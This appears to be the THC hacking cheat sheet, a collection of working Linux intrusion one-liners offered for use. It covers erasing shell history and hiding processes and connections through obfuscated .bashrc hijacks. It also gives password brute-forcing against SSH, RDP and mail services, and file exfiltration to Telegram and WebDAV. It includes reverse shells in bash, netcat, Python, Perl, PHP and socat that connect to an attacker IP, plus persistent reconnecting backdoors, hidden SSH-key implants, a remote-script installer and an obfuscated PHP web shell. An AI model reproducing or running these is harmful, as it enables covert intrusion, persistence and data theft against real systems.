THC's favourite Tips, Tricks & Hacks (Cheat Sheet)
A collection of our favourite tricks. Many of those tricks are not from us. We merely collect them.
We show the tricks 'as is' without any explanation why they work. You need to know Linux to understand how and why they work.
Got tricks? Join us on Telegram: https://t.me/thcorg
- Bash
- SSH
- Network
- Data Upload/Download/Exfil
- Reverse Shell / Dumb Shell
- Backdoors
- Shell Hacks
- Crypto
- Sniffing a user's SSH session
- VPN and Shells
- OSINT Intelligence Gathering
- Miscellaneous
- Other Sites
1. Bash / Shell
1.i. Leave Bash without history:
Tell Bash to use /dev/null instead of ~/.bash_history. This is the first command we execute on every shell. It will stop the Bash from logging your commands.
export HISTFILE=/dev/null
unset SSH_CONNECTION SSH_CLIENT
(We also clear SSH_* variables in case we logged in with SSH. Otherwise any process we start gets a copy of our IP in /proc/self/environ.)
It is good housekeeping to 'commit suicide' when exiting a shell:
alias exit='kill -9 $$'
Any command starting with a " " (space) will not get logged to history either.
$ id
1.ii. Hide your command / Daemonzie your command
Hide as "syslogd".
(exec -a syslogd nmap -T0 10.0.2.1/24) # Note the brackets '(' and ')'
Start a background hidden process:
(exec -a syslogd nmap -T0 10.0.2.1/24 &>nmap.log &)
Start within a GNU screen:
screen -dmS MyName nmap -T0 10.0.2.1/24
### Attach back to the nmap process
screen -x MyName
Alternatively if there is no Bash:
cp `which nmap` syslogd
PATH=.:$PATH syslogd -T0 10.0.2.1/24
In this example we execute nmap but let it appear with the name syslogd in ps alxwww process list.
Download zap-args.c. This example will execute nmap but will make it appear as 'syslogd' without any arguments in the ps alxww output.
gcc -Wall -O2 -fpic -shared -o zap-args.so zap-args.c -ldl
(LD_PRELOAD=./zap-args.so exec -a syslogd nmap -T0 10.0.0.1/24)
### Or as daemon background process:
(LD_PRELOAD=./zap-args.so exec -a syslogd nmap -T0 10.0.0.1/24 &>nmap.log &)
Note: There is a gdb variant as well. Anyone?
1.iv. Hide a Network Connection
The trick is to hijack netstat
and use grep to filter out our connection. This example filters any connection on port 31337 or ip 1.2.3.4. The same should be done for ss
(a netstat alternative).
Method 1 - Hiding a connection with bash-function in ~/.bashrc
Cut & paste this to add the line to ~/.bashrc
echo 'netstat(){ command netstat "$@" | grep -Fv -e :31337 -e 1.2.3.4; }' >>~/.bashrc \
&& touch -r /etc/passwd ~/.bashrc
Or cut & paste this for an obfuscated entry to ~/.bashrc:
X='netstat(){ command netstat "$@" | grep -Fv -e :31337 -e 1.2.3.4; }'
echo "eval \$(echo $(echo "$X" | xxd -ps -c1024)|xxd -r -ps) #Initialize PRNG" >>~/.bashrc \
&& touch -r /etc/passwd ~/.bashrc
The obfuscated entry to ~/.bashrc will look like this:
eval $(echo 6e65747374617428297b20636f6d6d616e64206e6574737461742022244022207c2067726570202d4676202d65203a3331333337202d6520312e322e332e343b207d0a|xxd -r -ps) #Initialize PRNG
Method 2 - Hiding a connection with a binary in $PATH
Create a fake netstat binary in /usr/local/sbin. On a default Debian (and most Linux) the PATH variables (echo $PATH
) lists /usr/local/sbin before /usr/bin. This means that our hijacking binary /usr/local/sbin/netstat will be executed instead of /usr/bin/netstat.
echo -e "#! /bin/bash
exec /usr/bin/netstat \"\$@\" | grep -Fv -e :22 -e 1.2.3.4" >/usr/local/sbin/netstat \
&& chmod 755 /usr/local/sbin/netstat \
&& touch -r /usr/bin/netstat /usr/local/sbin/netstat
(thank you iamaskid)
Continuing from "Hiding a connection" the same technique can be used to hide a process. This example hides the nmap process and also takes care that our grep
does not show up in the process list by renaming it to GREP:
echo 'ps(){ command ps "$@" | exec -a GREP grep -Fv -e nmap -e GREP; }' >>~/.bashrc \
&& touch -r /etc/passwd ~/.bashrc
This requires root privileges and is an old Linux trick by over-mounting /proc/<pid> with a useless directory:
hide()
{
[[ -L /etc/mtab ]] && { cp /etc/mtab /etc/mtab.bak; mv /etc/mtab.bak /etc/mtab; }
_pid=${1:-$$}
[[ $_pid =~ ^[0-9]+$ ]] && { mount -n --bind /dev/shm /proc/$_pid && echo "[THC] PID $_pid is now hidden"; return; }
local _argstr
for _x in "${@:2}"; do _argstr+=" '${_x//\'/\'\"\'\"\'}'"; done
[[ $(bash -c "ps -o stat= -p \$\$") =~ \+ ]] || exec bash -c "mount -n --bind /dev/shm /proc/\$\$; exec \"$1\" $_argstr"
bash -c "mount -n --bind /dev/shm /proc/\$\$; exec \"$1\" $_argstr"
}
To hide a command use:
hide # Hides the current shell/PID
hide 31337 # Hides process with pid 31337
hide sleep 1234 # Hides 'sleep 1234'
hide nohup sleep 1234 &>/dev/null & # Starts and hides 'sleep 1234' as a background process
(thanks to druichi for improving this)
Above we discussed how to obfuscate a line in ~/.bashrc. An often used trick is to use source
instead. The source command can be shortened to .
(yes, a dot) and it also searches through the $PATH variable to find the file to load.
In this example our script prng
contains all of our shell functions from above. Those functions hide the nmap
process and the network connection. Last we add . prng
into the systemwide rc file. This will load prng
when the user (and root) logs in:
echo -e 'netstat(){ command netstat "$@" | grep -Fv -e :31337 -e 1.2.3.4; }
ps(){ command ps "$@" | exec -a GREP grep -Fv -e nmap -e GREP; }' >/usr/bin/prng \
&& echo ". prng #Initialize Pseudo Random Number Generator" >>/etc/bash.bashrc \
&& touch -r /etc/ld.so.conf /usr/bin/prng /etc/bash.bashrc
(The same works for lsof
, ss
and ls
)
ANSI escape characters or a simple \r
(carriage return) can be used to hide from cat
and others.
Hide the last command (example: id
) in ~/.bashrc
:
echo -e "id #\\033[2K\\033[1A" >>~/.bashrc
### The ANSI escape sequence \\033[2K erases the line. The next sequence \\033[1A
### moves the cursor 1 line up.
### The '#' after the command 'id' is a comment and is needed so that bash still
### executes the 'id' but ignores the two ANSI escape sequences.
Note: We use echo -e
to convert \\033
to the ANSI escape character (hex 0x1b).
Adding a \r
(carriage return) goes a long way to hide your ssh key from cat
:
echo "ssh-ed25519 AAAAOurPublicKeyHere....blah x@y"$'\r'"$(<authorized_keys)" >authorized_keys
### This adds our key as the first key and 'cat authorized_keys' wont show
### it. The $'\r' is a bash special to create a \r (carriage return).
2. SSH
Stops you from showing up in w or who command and stops logging the host to ~/.ssh/known_hosts.
ssh -o UserKnownHostsFile=/dev/null -T [email protected] "bash -i"
Go full comfort with PTY and colors: thcssh [email protected]
:
### Cut & Paste the following to your shell, then execute
### thcssh [email protected]
thcssh()
{
local ttyp
echo -e "\e[0;35mTHC says: pimp up your prompt: Cut & Paste the following into your remote shell:\e[0;36m"
echo -e 'PS1="{THC} \[\\033[36m\]\\u\[\\033[m\]@\[\\033[32m\]\\h:\[\\033[33;1m\]\\w\[\\033[m\]\\$ "\e[0m'
ttyp=$(stty -g)
stty raw -echo opost
[[ $(ssh -V 2>&1) == OpenSSH_[67]* ]] && a="no"
ssh -o UpdateHostKeys=no -o StrictHostKeyChecking="${a:-accept-new}" -T \
"$@" \
"unset SSH_CLIENT SSH_CONNECTION; TERM=xterm-256color BASH_HISTORY=/dev/null exec -a [ntp] script -qc 'exec -a [uid] /bin/bash -i' /dev/null"
stty "${ttyp}"
}
We use this all the time to circumvent local firewalls and IP filtering:
ssh -g -L31337:1.2.3.4:80 [email protected]
You or anyone else can now connect to your computer on port 31337 and get tunneled to 1.2.3.4 port 80 and appear with the source IP of 'server.org'. An alternative and without the need for a server is to use gs-netcat.
Clever hackers use the keyboard combination ~C
to dynamically create these tunnels without having to reconnect the SSH. (thanks MessedeDegod).
We use this to give access to a friend to an internal machine that is not on the public Internet:
ssh -o ExitOnForwardFailure=yes -g -R31338:192.168.0.5:80 [email protected]
Anyone connecting to server.org:31338 will get tunneled to 192.168.0.5 on port 80 via your computer. An alternative and without the need for a server is to use gs-netcat.
OpenSSH 7.6 adds socks support for dynamic forwarding. Example: Tunnel all your browser traffic through your server.
ssh -D 1080 [email protected]
Now configure your browser to use SOCKS with 127.0.0.1:1080. All your traffic is now tunneled through server.org and will appear with the source IP of server.org. An alternative and without the need for a server is to use gs-netcat.
This is the reverse of the above example. It give others access to your local network or let others use your computer as a tunnel end-point.
ssh -g -R 1080 [email protected]
The others configuring server.org:1080 as their SOCKS4/5 proxy. They can now connect to any computer on any port that your computer has access to. This includes access to computers behind your firewall that are on your local network. An alternative and without the need for a server is to use gs-netcat.
ssh-j.com provides a great relay service: To access a host behind NAT/Firewall (via SSH).
On the host behind NAT: Create a reverse SSH tunnel to ssh-j.com like so:
## Cut & Paste on the host behind NAT.
ssh_j()
{
local pw
pw=$1
[[ -z $pw ]] && { pw=$(head -c64 </dev/urandom | base64 | tr -d -c a-z0-9); pw=${pw:0:12}; }
echo "Press Ctrl-C to stop this tunnel."
echo -e "To connect to this host: \e[0;36mssh -J ${pw}@ssh-j.com ${USER:-root}@${pw}\e[0m"
ssh -o StrictHostKeyChecking=accept-new -o ServerAliveInterval=30 -o ExitOnForwardFailure=yes ${pw}@ssh-j.com -N -R ${pw}:22:${2:-0}:${3:-22}
}
ssh_j # Generates a random tunnel ID [e.g. 5dmxf27tl4kx] and keeps the tunnel connected
ssh_j foobarblahblub # Creates tunnel with specific tunnel ID
ssh_j foobarblahblub 192.168.0.1 2222 # Tunnel to host 192.168.0.1 on port 2222 on the LAN
Then use this command from anywhere else in the world to connect as 'root' to 'foobarblahblub' (the host behind the NAT):
ssh -J [email protected] root@foobarblahblub
The ssh connection goes via ssh-j.com into the reverse tunnel to the host behind NAT. The traffic is end-2-end encrypted and ssh-j.com can not see the content.
2.v SSH pivoting to multiple servers
SSH ProxyJump can save you a lot of time and hassle when working with remote servers. Let's assume the scenario:
Our workstation is $local-kali and we like to SSH into $target-host. There is no direct connection between our workstation and $target-host. Our workstation can only reach $C2. $C2 can reach $internal-jumphost (via internal eth1) and $internal-jumphost can reach the final $target-host via eth2.
$local-kali -> $C2 -> $internal-jumphost -> $target-host
eth0 192.168.8.160 10.25.237.119
eth1 192.168.5.130 192.168.5.135
eth2 172.16.2.120 172.16.2.121
We do not execute
ssh
on any computer but our trusted workstation - and neither shall you (ever).
That's where ProxyJump helps: We can 'jump' via the two intermediary servers $C2 and $internal-jumphost (without spawning a shell on those servers). The ssh-connection is end-2-end encrypted between our $local-kali and $target-host and no password or key is exposed to $C2 or $internal-jumphost.
## if we want to SSH to $target-host:
kali@local-kali$ ssh -J [email protected],[email protected] [email protected]
## if we want to SSH to just $internal-jumphost:
kali@local-kali$ ssh -J [email protected] [email protected]
We use this as well to hide our IP address when logging into servers.
3. Network
## ARP disocer computers on the local network
nmap -r -sn -PR 192.168.0.1/24
## ICMP discover computers on the local netowrk
NET="10.11.0" # discover 10.11.0.1-10.11.0.254
seq 1 254 | xargs -P20 -I{} ping -n -c3 -i0.2 -w1 -W200 "${NET:-192.168.0}.{}" | grep 'bytes from' | awk '{print $4" "$7;}' | sort -uV -k1,1
## Monitor every new TCP connection
tcpdump -n "tcp[tcpflags] == tcp-syn"
## Play a *bing*-noise for every new SSH connection
tcpdump -nlq "tcp[13] == 2 and dst port 22" | while read x; do echo "${x}"; echo -en \\a; done
## Ascii output (for all large packets. Change to >40 if no TCP options are used).
tcpdump -s 2048 -nAq 'tcp and (ip[2:2] > 60)'
## Connect to SSL (using socat)
socat stdio openssl-connect:smtp.gmail.com:465
## Connect to SSL (using openssl)
openssl s_client -connect smtp.gmail.com:465
## Bridge TCP to SSL
socat TCP-LISTEN:25,reuseaddr,fork openssl-connect:smtp.gmail.com:465
3.iii.b. HTTPS reverse tunnels
On the server:
### Reverse HTTPS tunnel to forward public HTTPS requests to Port 8080 on this server:
ssh -R80:0:8080 -o StrictHostKeyChecking=accept-new [email protected]
### Or using remote.moe
ssh -R80:0:8080 -o StrictHostKeyChecking=accept-new [email protected]
### Or using cloudflared
cloudflared tunnel --url http://localhost:8080 --no-autoupdate
Either tunnel will generate a new HTTPS-URL for you. Use this URL on your workstation (see below). Use Gost to tunnel raw TCP over the HTTP(s) link.
A simple STDIN/STDOUT pipe via HTTPS:
websocat -s 8080
### and on the workstation use this command to connect:
websocat wss://<HTTPS-URL>
Or run a Socks-Proxy (via HTTPS):
### On the server
gost -L mws://:8080
On the workstation:
Forward port 2222 to the server's port 22.
gost -L tcp://:2222/127.0.0.1:22 -F 'mwss://<HTTPS-URL>:443'
or use it as a Socks-Proxy:
gost -L :1080 -F 'mwss://<HTTPS-URL>:443'
### Test the Socks-proxy:
curl -x socks5h://0 ipinfo.io
More: https://github.com/twelvesec/port-forwarding and Tunnel via Cloudflare to any TCP Service and Awesome Tunneling.
3.iv. Use any tool via Socks Proxy
On the target's network:
## Create a SOCKS proxy into the target's network.
## Use gs-netcat but ssh -D would work as well.
gs-netcat -l -S
On your workstation:
## Create a gsocket tunnel into the target's network:
gs-netcat -p 1080
## Use ProxyChain to access any host on the target's network:
echo -e "[ProxyList]\nsocks5 127.0.0.1 1080" >pc.conf
proxychains -f pc.conf -q curl ipinfo.io
## Scan the router at 192.168.1.1
proxychains -f pc.conf -q nmap -n -Pn -sV -F --open 192.168.1.1
## Start 10 nmaps in parallel:
seq 1 254 | xargs -P10 -I{} proxychains -f pc.conf -q nmap -n -Pn -sV -F --open 192.168.1.{}
3.v. Find your public IP address
curl -s wtfismyip.com/json | jq
curl ifconfig.me
dig +short myip.opendns.com @resolver1.opendns.com
host myip.opendns.com resolver1.opendns.com
Get geolocation information about any IP address:
curl https://ipinfo.io/8.8.8.8 | jq
curl http://ip-api.com/8.8.8.8
curl https://cli.fyi/8.8.8.8
Get ASN information by IP address:
asn() {
[[ -n $1 ]] && { echo -e "begin\nverbose\n${1}\nend"|netcat whois.cymru.com 43| tail -n +2; return; }
(echo -e 'begin\nverbose';cat -;echo end)|netcat whois.cymru.com 43|tail -n +2
}
asn 1.1.1.1 # Single IP Lookup
cat IPS.txt | asn # Bulk Lookup
Check if TOR is working:
curl -x socks5h://localhost:9050 -s https://check.torproject.org/api/ip
### Result should be {"IsTor":true...
3.vi. Check reachability from around the world
The fine people at https://ping.pe/ let you ping/traceroute/mtr/dig/port-check a host from around the world, check TCP ports, resolve a domain name, ...and many other things.
To check how well your (current) host can reach Internet use OONI Probe:
ooniprobe run im
ooniprobe run websites
ooniprobe list
ooniprobe list 1
3.vii. Check/Scan Open Ports on an IP
Censys or Shodan Port lookup service:
curl https://internetdb.shodan.io/1.1.1.1
Fast (-F) vulnerability scan
# Version gathering
nmap -sCV -F -Pn --min-rate 10000 scanme.nmap.org
# Vulns
nmap -A -F -Pn --min-rate 10000 --script vulners.nse --script-timeout=5s scanme.nmap.org
hashcat --username -w3 my-hash /usr/share/wordlists/rockyou.txt
Read the FAQ or use Crackstation or ColabCat/cloud/Cloudtopolis or on AWS.
3.ix. Brute Force Passwords
The following is for brute forcing (guessing) passwords of ONLINE SERVICES.
GMail Imbeciles - CLICK HERE
You can not brute force GMAIL accounts.
SMTP AUTH/LOGIN IS DISABLED ON GMAIL.
All GMail Brute Force and Password Cracking tools are FAKE.
All tools are pre-installed on segfault:
ssh [email protected] # password is 'segfault'
(You may want to use your own EXIT node)
Tools:
Username & Password lists:
/usr/share/nmap/nselib/data
/usr/share/wordlists/seclists/Passwords
- https://github.com/berzerk0/Probable-Wordlists - >THC's FAVORITE<
- https://github.com/danielmiessler/SecLists
- https://wordlists.assetnote.io
- https://weakpass.com
- https://crackstation.net/
Set Username/Password list and Target host.
ULIST="/usr/share/wordlists/brutespray/mysql/user"
PLIST="/usr/share/wordlists/seclists/Passwords/500-worst-passwords.txt"
T="192.168.0.1"
Useful Nmap parameters:
--script-args userdb="${ULIST}",passdb="${PLIST}",brute.firstOnly
Useful Ncrack parameters:
-U "${ULIST}"
-P "${PLIST}"
Useful Hydra parameters:
-t4 # Limit to 4 tasks
-l root # Set username
-V # Show each login/password attempt
-s 31337 # Set port
-S # Use SSL
-f # Exit after first valid login
## SSH
nmap -p 22 --script ssh-brute --script-args ssh-brute.timeout=4s "$T"
ncrack -P "${PLIST}" --user root "ssh://${T}"
hydra -P "${PLIST}" -l root "ssh://$T"
## Remote Desktop Protocol / RDP
ncrack -P "${PLIST}" --user root -p3389 "${T}"
hydra -P "${PLIST}" -l root "rdp://$T"
## FTP
hydra -P "${PLIST}" -l user "ftp://$T"
## IMAP (email)
nmap -p 143,993 --script imap-brute "$T"
## POP3 (email)
nmap -p110,995 --script pop3-brute "$T"
## MySQL
nmap -p3306 --script mysql-brute "$T"
## PostgreSQL
nmap -p5432 --script pgsql-brute "$T"
## SMB (windows)
nmap --script smb-brute "$T"
## Telnet
nmap -p23 --script telnet-brute --script-args telnet-brute.timeout=8s "$T"
## VNC
nmap -p5900 --script vnc-brute "$T"
ncrack -P "${PLIST}" --user root "vnc://$T"
hydra -P "${PLIST}" "vnc://$T"
medusa -P "${PLIST}" –u root –M vnc -h "$T"
## VNC (with metasploit)
msfconsole
use auxiliary/scanner/vnc/vnc_login
set rhosts 192.168.0.1
set pass_file /usr/share/wordlists/seclists/Passwords/500-worst-passwords.txt
run
## HTML basic auth
echo admin >user.txt # Try only 1 username
echo -e "blah\naaddd\nfoobar" >pass.txt # Add some passwords to try. 'aaddd' is the valid one.
nmap -p80 --script http-brute --script-args \
http-brute.hostname=pentesteracademylab.appspot.com,http-brute.path=/lab/webapp/basicauth,userdb=user.txt,passdb=pass.txt,http-brute.method=POST,brute.firstOnly \
pentesteracademylab.appspot.com
4. Data Upload/Download/Exfil
4.i File Encoding
Encode binaries to text for transport via a terminal connection:
UU encode/decode
## uuencode
uuencode /etc/issue.net issue.net-COPY
Output - CLICK HERE
begin 644 issue.net-COPY
72V%L:2!'3E4O3&EN=7@@4F]L;&EN9PH`
`
end
## uudecode (cut & paste the 3 lines from above):
uudecode
Openssl encode/decode
## openssl encode
openssl base64 </etc/issue.net
Output - CLICK HERE
VWJ1bnR1IDE4LjA0LjIgTFRTCg==
## openssl decode (cut & paste the 1 line from above):
openssl base64 -d >issue.net-COPY
xxd encode/decode
## xxd encode
xxd -p </etc/issue.net
Output - CLICK HERE
4b616c6920474e552f4c696e757820526f6c6c696e670a
## xxd decode
xxd -p -r >issue.net-COPY
4.ii. File transfer - using cut & paste
Paste into a file on the remote machine (note the <<-'__EOF__'
to not mess with tabs or $-variables).
cat >output.txt <<-'__EOF__'
[...]
__EOF__ ### Finish your cut & paste by typing __EOF__
4.iii. File transfer - using screen
From REMOTE to LOCAL (download)
Have a screen running on your local computer and log into the remote system from within your shell. Instruct your local screen to log all output to screen-xfer.txt:
CTRL-a : logfile screen-xfer.txt
CTRL-a H
We use openssl to encode our data but any of the above encoding methods works. This command will display the base64 encoded data in the terminal and screen will write this data to screen-xfer.txt:
## On the remote system encode issue.net
openssl base64 </etc/issue.net
Stop your local screen from logging any further data:
CTRL-a H
On your local computer decode the file:
openssl base64 -d <screen-xfer.txt
rm -rf screen-xfer.txt
From LOCAL to REMOTE (upload)
On your local system encode the data:
openssl base64 </etc/issue.net >screen-xfer.txt
On the remote system (and from within the current screen):
openssl base64 -d
Get screen to slurp the base64 encoded data into screen's clipboard and paste the data from the clipboard to the remote system:
CTRL-a : readbuf screen-xfer.txt
CTRL-a : paste .
CTRL-d
CTRL-d
Note: Two CTRL-d are required due to a bug in openssl.
4.iv. File transfer - using gs-netcat and sftp
Use gs-netcat and encapsulate the sftp protocol within. Allows access to hosts behind NAT/Firewall.
gs-netcat -s MySecret -l -e /usr/lib/sftp-server # Host behind NAT/Firewall
From your workstation execute this command to connect to the SFTP server:
export GSOCKET_ARGS="-s MySecret" # Workstation
sftp -D gs-netcat # Workstation
4.v. File transfer - using HTTP
## Spawn a temporary HTTP server and share the current working directory.
python -m http.server 8080
## Request a temporary tunnel on a public domain
cloudflared tunnel -url localhost:8080
4.vi. File transfer without curl
Using bash, download only:
burl() {
IFS=/ read -r proto x host query <<<"$1"
exec 3<>"/dev/tcp/${host}/${PORT:-80}"
echo -en "GET /${query} HTTP/1.0\r\nHost: ${host}\r\n\r\n" >&3
(while read -r l; do echo >&2 "$l"; [[ $l == $'\r' ]] && break; done && cat ) <&3
exec 3>&-
}
# burl http://ipinfo.io
# PORT=31337 burl http://37.120.235.188/blah.tar.gz >blah.tar.gz
4.vii. File transfer - using WebDAV
On your workstation (e.g. segfault.net) start a Cloudflare-Tunnel and WebDAV:
cloudflared tunnel --url localhost:8080 &
# [...]
# +--------------------------------------------------------------------------------------------+
# | Your quick Tunnel has been created! Visit it at (it may take some time to be reachable): |
# | https://example-foo-bar-lights.trycloudflare.com |
# +--------------------------------------------------------------------------------------------+
# [...]
wsgidav --port=8080 --root=. --auth=anonymous
On another server:
# Upload a file to your workstation
curl -T file.dat https://example-foo-bar-lights.trycloudflare.com
# Create a directory remotely
curl -X MKCOL https://example-foo-bar-lights.trycloudflare.com/sources
# Create a directory hirachy remotely
find . -type d | xargs -I{} curl -X MKCOL https://example-foo-bar-lights.trycloudflare.com/sources/{}
# Upload all *.c files (in parallel):
find . -name '*.c' | xargs -P10 -I{} curl -T{} https://example-foo-bar-lights.trycloudflare.com/sources/{}
Access the share from Windows (to drag & drop files) in File Explorer:
\\example-foo-bar-lights.trycloudflare.com@SSL\sources
Or mount the WebDAV share on Windows (Z:/):
net use * \\example-foo-bar-lights.trycloudflare.com@SSL\sources
4.viii. File transfer to Telegram
There are zillions of upload services but TG is a neat alternative. Get a TG-Bot-Token from the TG BotFather. Then create a new TG group and add your bot to the group. Retrieve the chat_id of that group:
curl -s "https://api.telegram.org/bot<TG-BOT-TOKEN>/getUpdates" | jq -r '.result[].message.chat.id' | uniq
# If you get only {"ok":true,"result":[]} then remove and add the bot again.
# Upload file.zip straight into the group chat:
curl -sF [email protected] "https://api.telegram.org/bot<TG-BOT-TOKEN>/sendDocument?chat_id=<TG-CHAT-ID>"
5. Reverse Shell / Dumb Shell
5.i.a. Reverse shell with gs-netcat
Use gsocket deploy. It spawns a fully functioning PTY reverse shell and using the Global Socket Relay network. It uses 'password hashes' instead of IP addresses to connect. This means that you do not need to run your own Command & Control server for the backdoor to connect back to. If netcat is a swiss army knife than gs-netcat is a german battle axe :>
gs-netcat -s MySecret -l -i # Host
Use -D to start the reverse shell in the background (daemon) and with a watchdog to auto-restart if killed.
To connect to the shell from your workstation:
gs-netcat -s MySecret -i
Use -T to tunnel trough TOR.
5.i.b. Reverse shell with Bash
Start netcat to listen on port 1524 on your system:
nc -nvlp 1524
On the remote system, this command will connect back to your system (IP = 3.13.3.7, Port 1524) and give you a shell prompt:
# If the current shell is Bash already:
(bash -i &>/dev/tcp/3.13.3.7/1524 0>&1) &
# If the current shell is NOT Bash then we need:
bash -c '(exec bash -i &>/dev/tcp/3.13.3.7/1524 0>&1) &'
# or hide the bash process as 'kqueue'
bash -c '(exec -a kqueue bash -i &>/dev/tcp/3.13.3.7/1524 0>&1) &'
5.i.c. Reverse shell without Bash
Embedded systems do not always have Bash and the /dev/tcp/ trick will not work. There are many other ways (Python, PHP, Perl, ..). Our favorite is to upload netcat and use netcat or telnet:
On the remote system:
nc -e /bin/bash -vn 3.13.3.7 1524
Variant if '-e' is not supported:
mkfifo /tmp/.io
sh -i 2>&1 </tmp/.io | nc -vn 3.13.3.7 1524 >/tmp/.io
Telnet variant:
mkfifo /tmp/.io
sh -i 2>&1 </tmp/.io | telnet 3.13.3.7 1524 >/tmp/.io
Telnet variant when mkfifo is not supported (Ulg!):
(touch /dev/shm/.fio; sleep 60; rm -f /dev/shm/.fio) &
tail -f /dev/shm/.fio | sh -i 2>&1 | telnet 3.13.3.7 1524 >/dev/shm/.fio
Note: Use /tmp/.fio if /dev/shm is not available. Note: This trick logs your commands to a file. The file will be unlinked from the fs after 60 seconds but remains useable as a 'make shift pipe' as long as the reverse tunnel is started within 60 seconds.
5.i.d. Reverse shell with remote.moe and ssh
It is possible to tunnel raw TCP (e.g bash reverse shell) through remote.moe:
On your workstation:
# First Terminal - Create a remote.moe tunnel to your workstation
ssh-keygen -q -t rsa -N "" -f .r # New key creates a new remote.moe-address
ssh -i .r -R31337:0:8080 -o StrictHostKeyChecking=no [email protected]; rm -f .r
# Note down the 'remote.moe' address which will look something like
# uydsgl6i62nrr2zx3bgkdizlz2jq2muplpuinfkcat6ksfiffpoa.remote.moe
# Second Terminal - start listening for the reverse shell
nc -vnlp 8080
On the target(needs SSH and Bash):
bash -c '(killall ssh; rm -f /tmp/.r; ssh-keygen -q -t rsa -N "" -f /tmp/.r; ssh -i /tmp/.r -o StrictHostKeyChecking=no -L31338:uydsgl6i62nrr2zx3bgkdizlz2jq2muplpuinfkcat6ksfiffpoa.remote.moe:31337 -Nf remote.moe; bash -i &>/dev/tcp/0/31338 0>&1 &)'
On the target (alternative; needs ssh, bash and mkfifo):
rm -f /tmp/.p /tmp/.r; ssh-keygen -q -t rsa -N "" -f /tmp/.r && mkfifo /tmp/.p && (bash -i</tmp/.p 2>1 |ssh -i /tmp/.r -o StrictHostKeyChecking=no -W uydsgl6i62nrr2zx3bgkdizlz2jq2muplpuinfkcat6ksfiffpoa.remote.moe:31337 remote.moe>/tmp/.p &)
5.i.e. Reverse shell with Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("3.13.3.7",1524));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
5.i.f. Reverse shell with Perl
# method 1
perl -e 'use Socket;$i="3.13.3.7";$p=1524;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
# method 2
perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"3.13.3.7:1524");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
php -r '$sock=fsockopen("3.13.3.7",1524);exec("/bin/bash -i <&3 >&3 2>&3");'
5.ii.a. Upgrade a reverse shell to a PTY shell
Any of the above reverse shells are limited. For example sudo bash or top will not work. To make these work we have to upgrade the shell to a real PTY shell:
# Using script
exec script -qc /bin/bash /dev/null # Linux
exec script -q /dev/null /bin/bash # BSD
# Using python
exec python -c 'import pty; pty.spawn("/bin/bash")'
5.ii.b. Upgrade a reverse shell to a fully interactive shell
...and if we also like to use Ctrl-C etc then we have to go all the way and upgrade the reverse shell to a real fully colorful interactive shell:
# On the target host spwan a PTY using any of the above examples:
python -c 'import pty; pty.spawn("/bin/bash")'
# Now Press Ctrl-Z to suspend the connection and return to your own terminal.
# On your terminal execute:
stty raw -echo opost; fg
# On target host
export SHELL=/bin/bash
export TERM=xterm-256color
reset
stty rows 24 columns 120
# Pimp up your prompt
PS1='{THC} USERS=$(who | wc -l) LOAD=$(cut -f1 -d" " /proc/loadavg) PS=$(ps -e --no-headers|wc -l) \[\e[36m\]\u\[\e[m\]@\[\e[32m\]\h:\[\e[33;1m\]\w \[\e[0;31m\]\$\[\e[m\] '
5.ii.c. Reverse shell with socat (fully interactive)
...or install socat and get it done without much fiddling about:
# on attacker's host (listener)
socat file:`tty`,raw,echo=0 tcp-listen:1524
# on target host (reverse shell)
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:3.13.3.7:1524
6. Backdoors
Mostly we use gs-netcat's automated deployment script: https://www.gsocket.io/deploy.
bash -c "$(curl -fsSLk https://gsocket.io/x)"
or
bash -c "$(wget --no-check-certificate -qO- https://gsocket.io/x)"
A reverse shell that keeps trying to connect back to us every 360 seconds (indefinitely). Often used until a real backdoor can be deployed and guarantees easy re-entry to a system in case our connection gets disconnected.
setsid bash -c 'while :; do bash -i &>/dev/tcp/3.13.3.7/1524 0>&1; sleep 360; done' &>/dev/null
or the user's ~/.profile (also stops multiple instances from being started):
fuser /dev/shm/.busy &>/dev/null || nohup /bin/bash -c 'while :; do touch /dev/shm/.busy; exec 3</dev/shm/.busy; bash -i &>/dev/tcp/3.13.3.7/1524 0>&1 ; sleep 360; done' &>/dev/null &
Add your ssh public key to /root/.ssh/authorized_keys. It's the most reliable backdoor ever :>
- It survives reboots.
- It even survives re-installs. Admins have been known to make a backup of authorized_keys and then put it straight back onto the newly installed system.
- We have even seen our key being copied to other companies!
Tip: Change the name at the end of the ssh public keyfile to something obscure like backup@ubuntu or the admin's real name:
$ cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCktFkgm40GDkqYwJkNZVb+NLqYoUNSPVPLx0VDbJM0
[...]
u1i+MhhnCQxyBZbrWkFWyzEmmHjZdAZCK05FRXYZRI9yadmvo7QKtRmliqABMU9WGy210PTOLMltbt2C
c3zxLNse/xg0CC16elJpt7IqCFV19AqfHnK4YiXwVJ+M+PyAp/aEAujtHDHp backup@ubuntu
6.iii. Remote Access to an entire network
Install gs-netcat. It creates a SOCKS exit-node on the Host's private LAN which is accessible through the Global Socket Relay Network without the need to run your own relay-server (e.g. access the remote private LAN directly from your workstation):
gs-netcat -l -S # compromised Host
Now from your workstation you can connect to ANY host on the Host's private LAN:
gs-netcat -p 1080 # Your workstation.
# Access route.local:22 on the Host's private LAN from your Workstation:
socat - "SOCKS4a:127.1:route.local:22"
Read Use any tool via Socks Proxy.
Other methods:
- Gost/Cloudflared - our very own article
- Reverse Wireguard - from segfault.net to any (internal) network.
Add this line to the beginning of any PHP file:
<?php $i=base64_decode("aWYoaXNzZXQoJF9HRVRbMF0pKXtlY2hvIGAkX0dFVFswXWA7ZXhpdDt9");eval($i);?>
(Thanks @dono for making this 3 bytes smaller than the smallest)
Test the backdoor:
### 1. Optional: Start a test PHP server
cd /var/www/html && php -S 127.0.0.1:8080
### Without executing a command
curl http://127.0.0.1:8080/test.php
### With executing a command
